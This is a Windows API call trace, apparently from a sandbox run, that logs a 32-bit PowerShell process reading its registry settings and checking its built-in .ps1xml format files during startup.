	[0223.473] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.473] GetLastError () returned 0x0
	[0223.473] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.473] GetLastError () returned 0x0
	[0223.473] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.473] GetLastError () returned 0x0
	[0223.473] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.473] GetLastError () returned 0x0
	[0223.473] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.473] GetLastError () returned 0x0
	[0223.474] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.474] GetLastError () returned 0x0
	[0223.474] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.474] GetLastError () returned 0x0
	[0223.474] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1b4, lpOverlapped=0x0) returned 1
	[0223.474] GetLastError () returned 0x0
	[0223.474] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x0, lpOverlapped=0x0) returned 1
	[0223.474] GetLastError () returned 0x0
	[0223.475] CloseHandle (hObject=0x364) returned 1
	[0223.475] GetLastError () returned 0x0
	[0223.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10e694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0223.475] GetLastError () returned 0x0
	[0223.475] SetErrorMode (uMode=0x1) returned 0x1
	[0223.475] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2ac32fc | out: lpFileInformation=0x2ac32fc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0223.475] GetLastError () returned 0x0
	[0223.475] SetErrorMode (uMode=0x1) returned 0x1
	[0223.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10e660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0223.475] GetLastError () returned 0x0
	[0223.475] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10eab8 | out: phkResult=0x10eab8*=0x364) returned 0x0
	[0223.475] RegQueryValueExW (in: hKey=0x364, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10eb00, lpData=0x0, lpcbData=0x10eafc*=0x0 | out: lpType=0x10eb00*=0x1, lpData=0x0, lpcbData=0x10eafc*=0x56) returned 0x0
	[0223.476] RegQueryValueExW (in: hKey=0x364, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10eb00, lpData=0x5090b0, lpcbData=0x10eafc*=0x56 | out: lpType=0x10eb00*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x10eafc*=0x56) returned 0x0
	[0223.476] RegCloseKey (hKey=0x364) returned 0x0
	[0223.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10e660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0223.476] GetLastError () returned 0x0
	[0223.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10e5f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0223.476] GetLastError () returned 0x0
	[0224.001] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.109] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.111] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.111] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.111] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.111] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.113] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.116] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.131] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.132] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.132] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.132] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.132] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.133] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.133] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.133] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.141] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.241] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.242] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.243] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.243] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.244] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.245] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.245] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.245] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.246] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.246] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.247] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.247] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.247] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.249] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.270] VirtualQuery (in: lpAddress=0x10d9f8, lpBuffer=0x10e9f8, dwLength=0x1c | out: lpBuffer=0x10e9f8*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.270] VirtualQuery (in: lpAddress=0x10d9f8, lpBuffer=0x10e9f8, dwLength=0x1c | out: lpBuffer=0x10e9f8*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.270] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.272] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.388] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.389] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.389] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.405] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0224.405] GetLastError () returned 0xcb
	[0224.408] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.419] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.419] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.419] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.419] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.421] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.421] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.519] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.522] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.524] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10eb7c | out: phkResult=0x10eb7c*=0x35c) returned 0x0
	[0224.525] RegQueryValueExW (in: hKey=0x35c, lpValueName="path", lpReserved=0x0, lpType=0x10ebe4, lpData=0x0, lpcbData=0x10ebe0*=0x0 | out: lpType=0x10ebe4*=0x1, lpData=0x0, lpcbData=0x10ebe0*=0x74) returned 0x0
	[0224.525] RegQueryValueExW (in: hKey=0x35c, lpValueName="path", lpReserved=0x0, lpType=0x10ebc4, lpData=0x0, lpcbData=0x10ebc0*=0x0 | out: lpType=0x10ebc4*=0x1, lpData=0x0, lpcbData=0x10ebc0*=0x74) returned 0x0
	[0224.525] RegQueryValueExW (in: hKey=0x35c, lpValueName="path", lpReserved=0x0, lpType=0x10ebc4, lpData=0x5090b0, lpcbData=0x10ebc0*=0x74 | out: lpType=0x10ebc4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x10ebc0*=0x74) returned 0x0
	[0224.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x10e744, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0224.525] GetLastError () returned 0xcb
	[0224.525] SetErrorMode (uMode=0x1) returned 0x1
	[0224.525] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x10ebc4 | out: lpFileInformation=0x10ebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0224.526] GetLastError () returned 0xcb
	[0224.526] SetErrorMode (uMode=0x1) returned 0x1
	[0224.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e738, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0224.527] GetLastError () returned 0xcb
	[0224.527] SetErrorMode (uMode=0x1) returned 0x1
	[0224.528] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10ebb8 | out: lpFileInformation=0x10ebb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0224.528] GetLastError () returned 0xcb
	[0224.528] SetErrorMode (uMode=0x1) returned 0x1
	[0224.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e738, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0224.528] GetLastError () returned 0xcb
	[0224.528] SetErrorMode (uMode=0x1) returned 0x1
	[0224.528] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10ebb8 | out: lpFileInformation=0x10ebb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0224.528] GetLastError () returned 0xcb
	[0224.528] SetErrorMode (uMode=0x1) returned 0x1
	[0224.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e738, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0224.528] GetLastError () returned 0xcb
	[0224.528] SetErrorMode (uMode=0x1) returned 0x1
	[0224.528] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10ebb8 | out: lpFileInformation=0x10ebb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0224.528] GetLastError () returned 0xcb
	[0224.529] SetErrorMode (uMode=0x1) returned 0x1
	[0224.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e738, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0224.529] GetLastError () returned 0xcb
	[0224.529] SetErrorMode (uMode=0x1) returned 0x1
	[0224.529] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10ebb8 | out: lpFileInformation=0x10ebb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0224.529] GetLastError () returned 0xcb
	[0224.529] SetErrorMode (uMode=0x1) returned 0x1
	[0224.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e738, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0224.529] GetLastError () returned 0xcb
	[0224.529] SetErrorMode (uMode=0x1) returned 0x1
